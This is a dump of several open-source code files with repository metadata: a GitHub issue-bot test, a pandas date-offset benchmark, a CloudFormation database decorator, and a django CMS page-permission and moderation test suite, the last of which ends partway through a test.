self.assertEquals(c.has_milestone_preventing_close({
'milestone': { 'url': 'https://api.github.com/repos/octocat/Hello-World/milestones/1' }
}), True)
def test_has_events_preventing_close(self):
self.assertEquals(c.has_events_preventing_close(None), False)
self.assertEquals(c.has_events_preventing_close([
{ 'event': 'closed' },
{ 'event': 'labeled' }
]), False)
self.assertEquals(c.has_events_preventing_close([
{ 'event': 'closed' },
{ 'event': 'referenced' }
]), True)
|
driftyco/ionitron-issues
|
tests/test_close_old_issue.py
|
Python
|
mit
| 3,578 | 0.006149 |
# -*- coding: utf-8 -*-
from datetime import datetime
import numpy as np
import pandas as pd
try:
import pandas.tseries.holiday # noqa
except ImportError:
pass
hcal = pd.tseries.holiday.USFederalHolidayCalendar()
# These offests currently raise a NotImplimentedError with .apply_index()
non_apply = [pd.offsets.Day(),
pd.offsets.BYearEnd(),
pd.offsets.BYearBegin(),
pd.offsets.BQuarterEnd(),
pd.offsets.BQuarterBegin(),
pd.offsets.BMonthEnd(),
pd.offsets.BMonthBegin(),
pd.offsets.CustomBusinessDay(),
pd.offsets.CustomBusinessDay(calendar=hcal),
pd.offsets.CustomBusinessMonthBegin(calendar=hcal),
pd.offsets.CustomBusinessMonthEnd(calendar=hcal),
pd.offsets.CustomBusinessMonthEnd(calendar=hcal)]
other_offsets = [pd.offsets.YearEnd(), pd.offsets.YearBegin(),
pd.offsets.QuarterEnd(), pd.offsets.QuarterBegin(),
pd.offsets.MonthEnd(), pd.offsets.MonthBegin(),
pd.offsets.DateOffset(months=2, days=2),
pd.offsets.BusinessDay(), pd.offsets.SemiMonthEnd(),
pd.offsets.SemiMonthBegin()]
offsets = non_apply + other_offsets
class ApplyIndex(object):
goal_time = 0.2
params = other_offsets
param_names = ['offset']
def setup(self, offset):
N = 10000
self.rng = pd.date_range(start='1/1/2000', periods=N, freq='T')
def time_apply_index(self, offset):
offset.apply_index(self.rng)
class OnOffset(object):
goal_time = 0.2
params = offsets
param_names = ['offset']
def setup(self, offset):
self.dates = [datetime(2016, m, d)
for m in [10, 11, 12]
for d in [1, 2, 3, 28, 29, 30, 31]
if not (m == 11 and d == 31)]
def time_on_offset(self, offset):
for date in self.dates:
offset.onOffset(date)
class OffsetSeriesArithmetic(object):
goal_time = 0.2
params = offsets
param_names = ['offset']
def setup(self, offset):
N = 1000
rng = pd.date_range(start='1/1/2000', periods=N, freq='T')
self.data = pd.Series(rng)
def time_add_offset(self, offset):
self.data + offset
class OffsetDatetimeIndexArithmetic(object):
goal_time = 0.2
params = offsets
param_names = ['offset']
def setup(self, offset):
N = 1000
self.data = pd.date_range(start='1/1/2000', periods=N, freq='T')
def time_add_offset(self, offset):
self.data + offset
class OffestDatetimeArithmetic(object):
goal_time = 0.2
params = offsets
param_names = ['offset']
def setup(self, offset):
self.date = datetime(2011, 1, 1)
self.dt64 = np.datetime64('2011-01-01 09:00Z')
def time_apply(self, offset):
offset.apply(self.date)
def time_apply_np_dt64(self, offset):
offset.apply(self.dt64)
def time_add(self, offset):
self.date + offset
def time_add_10(self, offset):
self.date + (10 * offset)
def time_subtract(self, offset):
self.date - offset
def time_subtract_10(self, offset):
self.date - (10 * offset)
|
zfrenchee/pandas
|
asv_bench/benchmarks/offset.py
|
Python
|
bsd-3-clause
| 3,276 | 0 |
import logging
from spacel.provision.app.base_decorator import BaseTemplateDecorator
logger = logging.getLogger('spacel.provision.app.db')
class BaseDbTemplateDecorator(BaseTemplateDecorator):
def __init__(self, ingress):
super(BaseDbTemplateDecorator, self).__init__()
self._ingress = ingress
def _add_client_resources(self, resources, app_region, port, params,
sg_ref):
clients = params.get('clients', ())
ingress_resources = self._ingress.ingress_resources(app_region,
port,
clients,
sg_ref=sg_ref)
logger.debug('Adding %s ingress rules.', len(ingress_resources))
resources.update(ingress_resources)
|
pebble/spacel-provision
|
src/spacel/provision/app/db/base.py
|
Python
|
mit
| 874 | 0 |
# -*- coding: utf-8 -*-
from djangocms_text_ckeditor.models import Text
from django.contrib.admin.sites import site
from django.contrib.admin.utils import unquote
from django.contrib.auth import get_user_model
from django.contrib.auth.models import AnonymousUser, Group, Permission
from django.contrib.sites.models import Site
from django.core.management import call_command
from django.core.urlresolvers import reverse
from django.db.models import Q
from django.test.client import RequestFactory
from django.test.utils import override_settings
from django.utils.translation import override as force_language
from cms.api import (add_plugin, assign_user_to_page, create_page,
create_page_user, publish_page)
from cms.admin.forms import save_permissions
from cms.cms_menus import get_visible_nodes
from cms.management.commands.subcommands.moderator import log
from cms.models import Page, CMSPlugin, Title, ACCESS_PAGE
from cms.models.permissionmodels import (ACCESS_DESCENDANTS,
ACCESS_PAGE_AND_DESCENDANTS,
PagePermission,
GlobalPagePermission)
from cms.plugin_pool import plugin_pool
from cms.test_utils.testcases import (URL_CMS_PAGE_ADD, CMSTestCase)
from cms.test_utils.util.context_managers import disable_logger
from cms.test_utils.util.fuzzy_int import FuzzyInt
from cms.utils import get_current_site
from cms.utils.page import get_page_from_path
from cms.utils.page_permissions import user_can_publish_page, user_can_view_page
def fake_tree_attrs(page):
page.depth = 1
page.path = '0001'
page.numchild = 0
@override_settings(CMS_PERMISSION=True)
class PermissionModeratorTests(CMSTestCase):
"""Permissions and moderator together
Fixtures contains 3 users and 1 published page and some other stuff
Users:
1. `super`: superuser
2. `master`: user with permissions to all applications
3. `slave`: user assigned to page `slave-home`
Pages:
1. `home`:
- published page
- master can do anything on its subpages, but not on home!
2. `master`:
- published page
- created by super
- `master` can do anything on it and its descendants
- subpages:
3. `slave-home`:
- not published
- assigned slave user which can add/change/delete/
move/publish this page and its descendants
- `master` user want to moderate this page and all descendants
4. `pageA`:
- created by super
- master can add/change/delete on it and descendants
"""
#TODO: Split this test case into one that tests publish functionality, and
#TODO: one that tests permission inheritance. This is too complex.
def setUp(self):
# create super user
self.user_super = self._create_user("super", is_staff=True,
is_superuser=True)
self.user_staff = self._create_user("staff", is_staff=True,
add_default_permissions=True)
self.add_permission(self.user_staff, 'publish_page')
self.user_master = self._create_user("master", is_staff=True,
add_default_permissions=True)
self.add_permission(self.user_master, 'publish_page')
self.user_slave = self._create_user("slave", is_staff=True,
add_default_permissions=True)
self.user_normal = self._create_user("normal", is_staff=False)
self.user_normal.user_permissions.add(
Permission.objects.get(codename='publish_page'))
with self.login_user_context(self.user_super):
self.home_page = create_page("home", "nav_playground.html", "en",
created_by=self.user_super)
# master page & master user
self.master_page = create_page("master", "nav_playground.html", "en")
# create non global, non staff user
self.user_non_global = self._create_user("nonglobal")
# assign master user under home page
assign_user_to_page(self.home_page, self.user_master,
grant_on=ACCESS_PAGE_AND_DESCENDANTS, grant_all=True)
# and to master page
assign_user_to_page(self.master_page, self.user_master,
grant_on=ACCESS_PAGE_AND_DESCENDANTS, grant_all=True)
# slave page & slave user
self.slave_page = create_page("slave-home", "col_two.html", "en",
parent=self.master_page, created_by=self.user_super)
assign_user_to_page(self.slave_page, self.user_slave, grant_all=True)
# create page_b
page_b = create_page("pageB", "nav_playground.html", "en", created_by=self.user_super)
# Normal user
# it's allowed for the normal user to view the page
assign_user_to_page(page_b, self.user_normal, can_view=True)
# create page_a - sample page from master
page_a = create_page("pageA", "nav_playground.html", "en",
created_by=self.user_super)
assign_user_to_page(page_a, self.user_master,
can_add=True, can_change=True, can_delete=True, can_publish=True,
can_move_page=True)
# publish after creating all drafts
publish_page(self.home_page, self.user_super, 'en')
publish_page(self.master_page, self.user_super, 'en')
self.page_b = publish_page(page_b, self.user_super, 'en')
def _add_plugin(self, user, page):
"""
Add a plugin using the test client to check for permissions.
"""
with self.login_user_context(user):
placeholder = page.placeholders.all()[0]
post_data = {
'body': 'Test'
}
endpoint = self.get_add_plugin_uri(placeholder, 'TextPlugin')
response = self.client.post(endpoint, post_data)
self.assertEqual(response.status_code, 302)
return response.content.decode('utf8')
def test_super_can_add_page_to_root(self):
with self.login_user_context(self.user_super):
response = self.client.get(URL_CMS_PAGE_ADD)
self.assertEqual(response.status_code, 200)
def test_master_cannot_add_page_to_root(self):
with self.login_user_context(self.user_master):
response = self.client.get(URL_CMS_PAGE_ADD)
self.assertEqual(response.status_code, 403)
def test_slave_cannot_add_page_to_root(self):
with self.login_user_context(self.user_slave):
response = self.client.get(URL_CMS_PAGE_ADD)
self.assertEqual(response.status_code, 403)
def test_slave_can_add_page_under_slave_home(self):
with self.login_user_context(self.user_slave):
# move to admin.py?
# url = URL_CMS_PAGE_ADD + "?target=%d&position=last-child" % slave_page.pk
# can he even access it over get?
# response = self.client.get(url)
# self.assertEqual(response.status_code, 200)
# add page
page = create_page("page", "nav_playground.html", "en",
parent=self.slave_page, created_by=self.user_slave)
# adds user_slave as page moderator for this page
# public model shouldn't be available yet, because of the moderation
# moderators and approval ok?
# must not have public object yet
self.assertFalse(page.publisher_public)
self.assertObjectExist(Title.objects, slug="page")
self.assertObjectDoesNotExist(Title.objects.public(), slug="page")
self.assertTrue(user_can_publish_page(self.user_slave, page))
# publish as slave, published as user_master before
publish_page(page, self.user_slave, 'en')
# user_slave is moderator for this page
# approve / publish as user_slave
# user master should be able to approve as well
@override_settings(
CMS_PLACEHOLDER_CONF={
'col_left': {
'default_plugins': [
{
'plugin_type': 'TextPlugin',
'values': {
'body': 'Lorem ipsum dolor sit amet, consectetur adipisicing elit. Culpa, repellendus, delectus, quo quasi ullam inventore quod quam aut voluptatum aliquam voluptatibus harum officiis officia nihil minus unde accusamus dolorem repudiandae.'
},
},
]
},
},
)
def test_default_plugins(self):
with self.login_user_context(self.user_slave):
self.assertEqual(CMSPlugin.objects.count(), 0)
response = self.client.get(self.slave_page.get_absolute_url(), {'edit': 1})
self.assertEqual(response.status_code, 200)
self.assertEqual(CMSPlugin.objects.count(), 1)
def test_page_added_by_slave_can_be_published_by_user_master(self):
# add page
page = create_page("page", "nav_playground.html", "en",
parent=self.slave_page, created_by=self.user_slave)
# same as test_slave_can_add_page_under_slave_home
# must not have public object yet
self.assertFalse(page.publisher_public)
self.assertTrue(user_can_publish_page(self.user_master, page))
# should be True user_master should have publish permissions for children as well
publish_page(self.slave_page, self.user_master, 'en')
page = publish_page(page, self.user_master, 'en')
self.assertTrue(page.publisher_public_id)
# user_master is moderator for top level page / but can't approve descendants?
# approve / publish as user_master
# user master should be able to approve descendants
def test_super_can_add_plugin(self):
self._add_plugin(self.user_super, page=self.slave_page)
def test_master_can_add_plugin(self):
self._add_plugin(self.user_master, page=self.slave_page)
def test_slave_can_add_plugin(self):
self._add_plugin(self.user_slave, page=self.slave_page)
def test_subtree_needs_approval(self):
# create page under slave_page
page = create_page("parent", "nav_playground.html", "en",
parent=self.home_page)
self.assertFalse(page.publisher_public)
# create subpage under page
subpage = create_page("subpage", "nav_playground.html", "en", parent=page, published=False)
# publish both of them in reverse order
subpage = publish_page(subpage, self.user_master, 'en')
# subpage should not be published, because parent is not published
self.assertNeverPublished(subpage)
# publish page (parent of subage)
page = publish_page(page, self.user_master, 'en')
self.assertPublished(page)
self.assertNeverPublished(subpage)
subpage = publish_page(subpage, self.user_master, 'en')
self.assertPublished(subpage)
def test_subtree_with_super(self):
# create page under root
page = create_page("page", "nav_playground.html", "en")
self.assertFalse(page.publisher_public)
# create subpage under page
subpage = create_page("subpage", "nav_playground.html", "en",
parent=page)
self.assertFalse(subpage.publisher_public)
# tree id must be the same
self.assertEqual(page.node.path[0:4], subpage.node.path[0:4])
# publish both of them
page = self.reload(page)
page = publish_page(page, self.user_super, 'en')
# reload subpage, there were an path change
subpage = self.reload(subpage)
self.assertEqual(page.node.path[0:4], subpage.node.path[0:4])
subpage = publish_page(subpage, self.user_super, 'en')
# tree id must stay the same
self.assertEqual(page.node.path[0:4], subpage.node.path[0:4])
def test_super_add_page_to_root(self):
"""Create page which is not under moderation in root, and check if
some properties are correct.
"""
# create page under root
page = create_page("page", "nav_playground.html", "en")
# public must not exist
self.assertFalse(page.publisher_public)
def test_plugins_get_published(self):
# create page under root
page = create_page("page", "nav_playground.html", "en")
placeholder = page.placeholders.all()[0]
add_plugin(placeholder, "TextPlugin", "en", body="test")
# public must not exist
self.assertEqual(CMSPlugin.objects.all().count(), 1)
publish_page(page, self.user_super, 'en')
self.assertEqual(CMSPlugin.objects.all().count(), 2)
def test_remove_plugin_page_under_moderation(self):
# login as slave and create page
page = create_page("page", "nav_playground.html", "en", parent=self.slave_page)
# add plugin
placeholder = page.placeholders.all()[0]
plugin = add_plugin(placeholder, "TextPlugin", "en", body="test")
# publish page
page = self.reload(page)
page = publish_page(page, self.user_slave, 'en')
# only the draft plugin should exist
self.assertEqual(CMSPlugin.objects.all().count(), 1)
# master approves and publishes the page
# first approve slave-home
slave_page = self.reload(self.slave_page)
publish_page(slave_page, self.user_master, 'en')
page = self.reload(page)
page = publish_page(page, self.user_master, 'en')
# draft and public plugins should now exist
self.assertEqual(CMSPlugin.objects.all().count(), 2)
# login as slave and delete the plugin - should require moderation
with self.login_user_context(self.user_slave):
plugin_data = {
'plugin_id': plugin.pk
}
endpoint = self.get_delete_plugin_uri(plugin)
response = self.client.post(endpoint, plugin_data)
self.assertEqual(response.status_code, 302)
# there should only be a public plugin - since the draft has been deleted
self.assertEqual(CMSPlugin.objects.all().count(), 1)
page = self.reload(page)
# login as super user and approve/publish the page
publish_page(page, self.user_super, 'en')
# there should now be 0 plugins
self.assertEqual(CMSPlugin.objects.all().count(), 0)
def test_superuser_can_view(self):
url = self.page_b.get_absolute_url(language='en')
with self.login_user_context(self.user_super):
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
def test_staff_can_view(self):
url = self.page_b.get_absolute_url(language='en')
all_view_perms = PagePermission.objects.filter(can_view=True)
# verifiy that the user_staff has access to this page
has_perm = False
for perm in all_view_perms:
if perm.page == self.page_b:
if perm.user == self.user_staff:
has_perm = True
self.assertEqual(has_perm, False)
login_ok = self.client.login(username=getattr(self.user_staff, get_user_model().USERNAME_FIELD),
password=getattr(self.user_staff, get_user_model().USERNAME_FIELD))
self.assertTrue(login_ok)
# really logged in
self.assertTrue('_auth_user_id' in self.client.session)
login_user_id = self.client.session.get('_auth_user_id')
user = get_user_model().objects.get(pk=self.user_staff.pk)
self.assertEqual(str(login_user_id), str(user.id))
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_user_normal_can_view(self):
url = self.page_b.get_absolute_url(language='en')
all_view_perms = PagePermission.objects.filter(can_view=True)
# verifiy that the normal_user has access to this page
normal_has_perm = False
for perm in all_view_perms:
if perm.page == self.page_b:
if perm.user == self.user_normal:
normal_has_perm = True
self.assertTrue(normal_has_perm)
with self.login_user_context(self.user_normal):
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
# verifiy that the user_non_global has not access to this page
non_global_has_perm = False
for perm in all_view_perms:
if perm.page == self.page_b:
if perm.user == self.user_non_global:
non_global_has_perm = True
self.assertFalse(non_global_has_perm)
with self.login_user_context(self.user_non_global):
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
# non logged in user
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_user_globalpermission(self):
# Global user
user_global = self._create_user("global")
with self.login_user_context(self.user_super):
user_global = create_page_user(user_global, user_global)
user_global.is_staff = False
user_global.save() # Prevent is_staff permission
global_page = create_page("global", "nav_playground.html", "en",
published=True)
# Removed call since global page user doesn't have publish permission
#global_page = publish_page(global_page, user_global)
# it's allowed for the normal user to view the page
assign_user_to_page(global_page, user_global,
global_permission=True, can_view=True)
url = global_page.get_absolute_url('en')
all_view_perms = PagePermission.objects.filter(can_view=True)
has_perm = False
for perm in all_view_perms:
if perm.page == self.page_b and perm.user == user_global:
has_perm = True
self.assertEqual(has_perm, False)
global_page_perm_q = Q(user=user_global) & Q(can_view=True)
global_view_perms = GlobalPagePermission.objects.filter(global_page_perm_q).exists()
self.assertEqual(global_view_perms, True)
# user_global
with self.login_user_context(user_global):
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
# self.non_user_global
has_perm = False
for perm in all_view_perms:
if perm.page == self.page_b and perm.user == self.user_non_global:
has_perm = True
self.assertEqual(has_perm, False)
global_page_perm_q = Q(user=self.user_non_global) & Q(can_view=True)
global_view_perms = GlobalPagePermission.objects.filter(global_page_perm_q).exists()
self.assertEqual(global_view_perms, False)
with self.login_user_context(self.user_non_global):
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_anonymous_user_public_for_all(self):
url = self.page_b.get_absolute_url('en')
with self.settings(CMS_PUBLIC_FOR='all'):
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_anonymous_user_public_for_none(self):
# default of when to show pages to anonymous user doesn't take
# global permissions into account
url = self.page_b.get_absolute_url('en')
with self.settings(CMS_PUBLIC_FOR=None):
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
@override_settings(CMS_PERMISSION=True)
class PatricksMoveTest(CMSTestCase):
"""
Fixtures contains 3 users and 1 published page and some other stuff
Users:
1. `super`: superuser
2. `master`: user with permissions to all applications
3. `slave`: user assigned to page `slave-home`
Pages:
1. `home`:
- published page
- master can do anything on its subpages, but not on home!
2. `master`:
- published page
- crated by super
- `master` can do anything on it and its descendants
- subpages:
3. `slave-home`:
- not published
- assigned slave user which can add/change/delete/
move/publish/moderate this page and its descendants
- `master` user want to moderate this page and all descendants
4. `pageA`:
- created by super
- master can add/change/delete on it and descendants
"""
def setUp(self):
# create super user
self.user_super = self._create_user("super", True, True)
with self.login_user_context(self.user_super):
self.home_page = create_page("home", "nav_playground.html", "en",
created_by=self.user_super)
# master page & master user
self.master_page = create_page("master", "nav_playground.html", "en")
# create master user
self.user_master = self._create_user("master", True)
self.add_permission(self.user_master, 'change_page')
self.add_permission(self.user_master, 'publish_page')
#self.user_master = create_page_user(self.user_super, master, grant_all=True)
# assign master user under home page
assign_user_to_page(self.home_page, self.user_master,
grant_on=ACCESS_DESCENDANTS, grant_all=True)
# and to master page
assign_user_to_page(self.master_page, self.user_master, grant_all=True)
# slave page & slave user
self.slave_page = create_page("slave-home", "nav_playground.html", "en",
parent=self.master_page, created_by=self.user_super)
slave = self._create_user("slave", True)
self.user_slave = create_page_user(self.user_super, slave, can_add_page=True,
can_change_page=True, can_delete_page=True)
assign_user_to_page(self.slave_page, self.user_slave, grant_all=True)
# create page_a - sample page from master
page_a = create_page("pageA", "nav_playground.html", "en",
created_by=self.user_super)
assign_user_to_page(page_a, self.user_master,
can_add=True, can_change=True, can_delete=True, can_publish=True,
can_move_page=True)
# publish after creating all drafts
publish_page(self.home_page, self.user_super, 'en')
publish_page(self.master_page, self.user_super, 'en')
with self.login_user_context(self.user_slave):
# 000200010001
self.pa = create_page("pa", "nav_playground.html", "en", parent=self.slave_page)
# 000200010002
self.pb = create_page("pb", "nav_playground.html", "en", parent=self.pa, position="right")
# 000200010003
self.pc = create_page("pc", "nav_playground.html", "en", parent=self.pb, position="right")
self.pd = create_page("pd", "nav_playground.html", "en", parent=self.pb)
self.pe = create_page("pe", "nav_playground.html", "en", parent=self.pd, position="right")
self.pf = create_page("pf", "nav_playground.html", "en", parent=self.pe)
self.pg = create_page("pg", "nav_playground.html", "en", parent=self.pf, position="right")
self.ph = create_page("ph", "nav_playground.html", "en", parent=self.pf, position="right")
self.assertFalse(self.pg.publisher_public)
# login as master for approval
self.slave_page = self.slave_page.reload()
publish_page(self.slave_page, self.user_master, 'en')
# publish and approve them all
publish_page(self.pa, self.user_master, 'en')
publish_page(self.pb, self.user_master, 'en')
publish_page(self.pc, self.user_master, 'en')
publish_page(self.pd, self.user_master, 'en')
publish_page(self.pe, self.user_master, 'en')
publish_page(self.pf, self.user_master, 'en')
publish_page(self.pg, self.user_master, 'en')
publish_page(self.ph, self.user_master, 'en')
self.reload_pages()
def reload_pages(self):
self.pa = self.pa.reload()
self.pb = self.pb.reload()
self.pc = self.pc.reload()
self.pd = self.pd.reload()
self.pe = self.pe.reload()
self.pf = self.pf.reload()
self.pg = self.pg.reload()
self.ph = self.ph.reload()
def test_patricks_move(self):
"""
Tests permmod when moving trees of pages.
1. build following tree (master node is approved and published)
slave-home
/ | \
A B C
/ \
D E
/ | \
F G H
2. perform move operations:
1. move G under C
2. move E under G
slave-home
/ | \
A B C
/ \
D G
\
E
/ \
F H
3. approve nodes in following order:
1. approve H
2. approve G
3. approve E
4. approve F
"""
self.assertEqual(self.pg.node.parent, self.pe.node)
# perform moves under slave...
self.move_page(self.pg, self.pc)
self.reload_pages()
# page is now under PC
self.assertEqual(self.pg.node.parent, self.pc.node)
self.assertEqual(self.pg.get_absolute_url(), self.pg.publisher_public.get_absolute_url())
self.move_page(self.pe, self.pg)
self.reload_pages()
self.assertEqual(self.pe.node.parent, self.pg.node)
self.ph = self.ph.reload()
# check urls - they should stay be the same now after the move
self.assertEqual(
self.pg.publisher_public.get_absolute_url(),
self.pg.get_absolute_url()
)
self.assertEqual(
self.ph.publisher_public.get_absolute_url(),
self.ph.get_absolute_url()
)
# check if urls are correct after move
self.assertEqual(
self.pg.publisher_public.get_absolute_url(),
u'%smaster/slave-home/pc/pg/' % self.get_pages_root()
)
self.assertEqual(
self.ph.publisher_public.get_absolute_url(),
u'%smaster/slave-home/pc/pg/pe/ph/' % self.get_pages_root()
)
class ModeratorSwitchCommandTest(CMSTestCase):
def test_switch_moderator_on(self):
site = get_current_site()
with force_language("en"):
pages_root = unquote(reverse("pages-root"))
page1 = create_page('page', 'nav_playground.html', 'en', published=True)
with disable_logger(log):
call_command('cms', 'moderator', 'on')
with force_language("en"):
path = page1.get_absolute_url()[len(pages_root):].strip('/')
page2 = get_page_from_path(site, path)
self.assertEqual(page1.get_absolute_url(), page2.get_absolute_url())
def test_table_name_patching(self):
"""
This tests the plugin models patching when publishing from the command line
"""
self.get_superuser()
create_page("The page!", "nav_playground.html", "en", published=True)
draft = Page.objects.drafts()[0]
draft.reverse_id = 'a_test' # we have to change *something*
draft.save()
add_plugin(draft.placeholders.get(slot=u"body"),
u"TextPlugin", u"en", body="Test content")
draft.publish('en')
add_plugin(draft.placeholders.get(slot=u"body"),
u"TextPlugin", u"en", body="Test content")
# Manually undoing table name patching
Text._meta.db_table = 'djangocms_text_ckeditor_text'
plugin_pool.patched = False
with disable_logger(log):
call_command('cms', 'moderator', 'on')
# Sanity check the database (we should have one draft and one public)
not_drafts = len(Page.objects.filter(publisher_is_draft=False))
drafts = len(Page.objects.filter(publisher_is_draft=True))
self.assertEqual(not_drafts, 1)
self.assertEqual(drafts, 1)
def test_switch_moderator_off(self):
site = get_current_site()
with force_language("en"):
pages_root = unquote(reverse("pages-root"))
page1 = create_page('page', 'nav_playground.html', 'en', published=True)
path = page1.get_absolute_url()[len(pages_root):].strip('/')
page2 = get_page_from_path(site, path)
self.assertIsNotNone(page2)
self.assertEqual(page1.get_absolute_url(), page2.get_absolute_url())
class ViewPermissionBaseTests(CMSTestCase):
def setUp(self):
self.page = create_page('testpage', 'nav_playground.html', 'en')
self.site = get_current_site()
def get_request(self, user=None):
attrs = {
'user': user or AnonymousUser(),
'REQUEST': {},
'POST': {},
'GET': {},
'session': {},
}
return type('Request', (object,), attrs)
def assertViewAllowed(self, page, user=None):
if not user:
user = AnonymousUser()
self.assertTrue(user_can_view_page(user, page))
def assertViewNotAllowed(self, page, user=None):
if not user:
user = AnonymousUser()
self.assertFalse(user_can_view_page(user, page))
@override_settings(
CMS_PERMISSION=False,
CMS_PUBLIC_FOR='staff',
)
class BasicViewPermissionTests(ViewPermissionBaseTests):
"""
Test functionality with CMS_PERMISSION set to false, as this is the
normal use case
"""
@override_settings(CMS_PUBLIC_FOR="all")
def test_unauth_public(self):
request = self.get_request()
with self.assertNumQueries(0):
self.assertViewAllowed(self.page)
self.assertEqual(get_visible_nodes(request, [self.page], self.site),
[self.page])
def test_unauth_non_access(self):
request = self.get_request()
with self.assertNumQueries(0):
self.assertViewNotAllowed(self.page)
self.assertEqual(get_visible_nodes(request, [self.page], self.site),
[])
@override_settings(CMS_PUBLIC_FOR="all")
def test_staff_public_all(self):
user = self.get_staff_user_with_no_permissions()
request = self.get_request(user)
with self.assertNumQueries(0):
self.assertViewAllowed(self.page, user)
self.assertEqual(get_visible_nodes(request, [self.page], self.site),
[self.page])
def test_staff_public_staff(self):
user = self.get_staff_user_with_no_permissions()
request = self.get_request(user)
with self.assertNumQueries(0):
self.assertViewAllowed(self.page, user)
self.assertEqual(get_visible_nodes(request, [self.page], self.site),
[self.page])
def test_staff_basic_auth(self):
user = self.get_staff_user_with_no_permissions()
request = self.get_request(user)
with self.assertNumQueries(0):
self.assertViewAllowed(self.page, user)
self.assertEqual(get_visible_nodes(request, [self.page], self.site),
[self.page])
@override_settings(CMS_PUBLIC_FOR="all")
def test_normal_basic_auth(self):
user = self.get_standard_user()
request = self.get_request(user)
with self.assertNumQueries(0):
self.assertViewAllowed(self.page, user)
self.assertEqual(get_visible_nodes(request, [self.page], self.site), [self.page])
@override_settings(
CMS_PERMISSION=True,
CMS_PUBLIC_FOR='none'
)
class UnrestrictedViewPermissionTests(ViewPermissionBaseTests):
"""
Test functionality with CMS_PERMISSION set to True but no restrictions
apply to this specific page
"""
def test_unauth_non_access(self):
request = self.get_request()
with self.assertNumQueries(1):
"""
The query is:
PagePermission query for the affected page (is the page restricted?)
"""
self.assertViewNotAllowed(self.page)
self.assertEqual(get_visible_nodes(request, [self.page], self.site), [])
def test_global_access(self):
user = self.get_standard_user()
GlobalPagePermission.objects.create(can_view=True, user=user)
request = self.get_request(user)
with self.assertNumQueries(4):
"""The queries are:
PagePermission query for the affected page (is the page restricted?)
Generic django permission lookup
content type lookup by permission lookup
GlobalPagePermission query for the page site
"""
self.assertViewAllowed(self.page, user)
self.assertEqual(get_visible_nodes(request, [self.page], self.site), [self.page])
def test_normal_denied(self):
user = self.get_standard_user()
request = self.get_request(user)
with self.assertNumQueries(4):
"""
The queries are:
PagePermission query for the affected page (is the page restricted?)
GlobalPagePermission query for the page site
User permissions query
Content type query
"""
self.assertViewNotAllowed(self.page, user)
self.assertEqual(get_visible_nodes(request, [self.page], self.site), [])
@override_settings(
CMS_PERMISSION=True,
CMS_PUBLIC_FOR='all'
)
class RestrictedViewPermissionTests(ViewPermissionBaseTests):
"""
Test functionality with CMS_PERMISSION set to True and view restrictions
apply to this specific page
"""
def setUp(self):
super(RestrictedViewPermissionTests, self).setUp()
self.group = Group.objects.create(name='testgroup')
self.pages = [self.page]
self.expected = [self.page]
PagePermission.objects.create(page=self.page, group=self.group, can_view=True, grant_on=ACCESS_PAGE)
def test_unauthed(self):
request = self.get_request()
with self.assertNumQueries(1):
"""The queries are:
PagePermission query for the affected page (is the page restricted?)
"""
self.assertViewNotAllowed(self.page)
self.assertEqual(get_visible_nodes(request, self.pages, self.site), [])
def test_page_permissions(self):
user = self.get_standard_user()
request = self.get_request(user)
PagePermission.objects.create(can_view=True, user=user, page=self.page, grant_on=ACCESS_PAGE)
with self.assertNumQueries(6):
"""
The queries are:
PagePermission query (is this page restricted)
content type lookup (x2)
GlobalpagePermission query for user
TreeNode lookup
PagePermission query for this user
"""
self.assertViewAllowed(self.page, user)
self.assertEqual(get_visible_nodes(request, self.pages, self.site), self.expected)
def test_page_group_permissions(self):
user = self.get_standard_user()
user.groups.add(self.group)
request = self.get_request(user)
with self.assertNumQueries(6):
"""
The queries are:
PagePermission query (is this page restricted)
content type lookup (x2)
GlobalpagePermission query for user
TreeNode lookup
PagePermission query for user
"""
self.assertViewAllowed(self.page, user)
self.assertEqual(get_visible_nodes(request, self.pages, self.site), self.expected)
def test_global_permission(self):
user = self.get_standard_user()
GlobalPagePermission.objects.create(can_view=True, user=user)
request = self.get_request(user)
with self.assertNumQueries(4):
"""
The queries are:
PagePermission query (is this page restricted)
Generic django permission lookup
content type lookup by permission lookup
GlobalpagePermission query for user
"""
self.assertViewAllowed(self.page, user)
self.assertEqual(get_visible_nodes(request, self.pages, self.site), self.expected)
def test_basic_perm_denied(self):
user = self.get_staff_user_with_no_permissions()
request = self.get_request(user)
with self.assertNumQueries(6):
"""
The queries are:
PagePermission query (is this page restricted)
content type lookup x2
GlobalpagePermission query for user
TreeNode lookup
PagePermission query for this user
"""
self.assertViewNotAllowed(self.page, user)
self.assertEqual(get_visible_nodes(request, self.pages, self.site), [])
def test_basic_perm(self):
user = self.get_standard_user()
user.user_permissions.add(Permission.objects.get(codename='view_page'))
request = self.get_request(user)
with self.assertNumQueries(3):
"""
The queries are:
PagePermission query (is this page restricted)
Generic django permission lookup
content type lookup by permission lookup
"""
self.assertViewAllowed(self.page, user)
self.assertEqual(get_visible_nodes(request, self.pages, self.site), self.expected)
class PublicViewPermissionTests(RestrictedViewPermissionTests):
""" Run the same tests as before, but on the public page instead. """
def setUp(self):
super(PublicViewPermissionTests, self).setUp()
self.page.publish('en')
self.pages = [self.page.publisher_public]
self.expected = [self.page.publisher_public]
class GlobalPermissionTests(CMSTestCase):
def test_emulate_admin_index(self):
""" Call methods that emulate the adminsite instance's index.
This test was basically the reason for the new manager, in light of the
problem highlighted in ticket #1120, which asserts that giving a user
no site-specific rights when creating a GlobalPagePermission should
allow access to all sites.
"""
# create and then ignore this user.
superuser = self._create_user("super", is_staff=True, is_active=True,
is_superuser=True)
superuser.set_password("super")
superuser.save()
site_1 = Site.objects.get(pk=1)
site_2 = Site.objects.create(domain='example2.com', name='example2.com')
SITES = [site_1, site_2]
# create 2 staff users
USERS = [
self._create_user("staff", is_staff=True, is_active=True),
self._create_user("staff_2", is_staff=True, is_active=True),
]
for user in USERS:
user.set_password('staff')
# re-use the same methods the UserPage form does.
# Note that it internally calls .save(), as we've not done so.
save_permissions({
'can_add_page': True,
'can_change_page': True,
'can_delete_page': False
}, user)
GlobalPagePermission.objects.create(can_add=True, can_change=True,
can_delete=False, user=USERS[0])
# we're querying here to ensure that even though we've created two users
# above, we should have successfully filtered to just one perm.
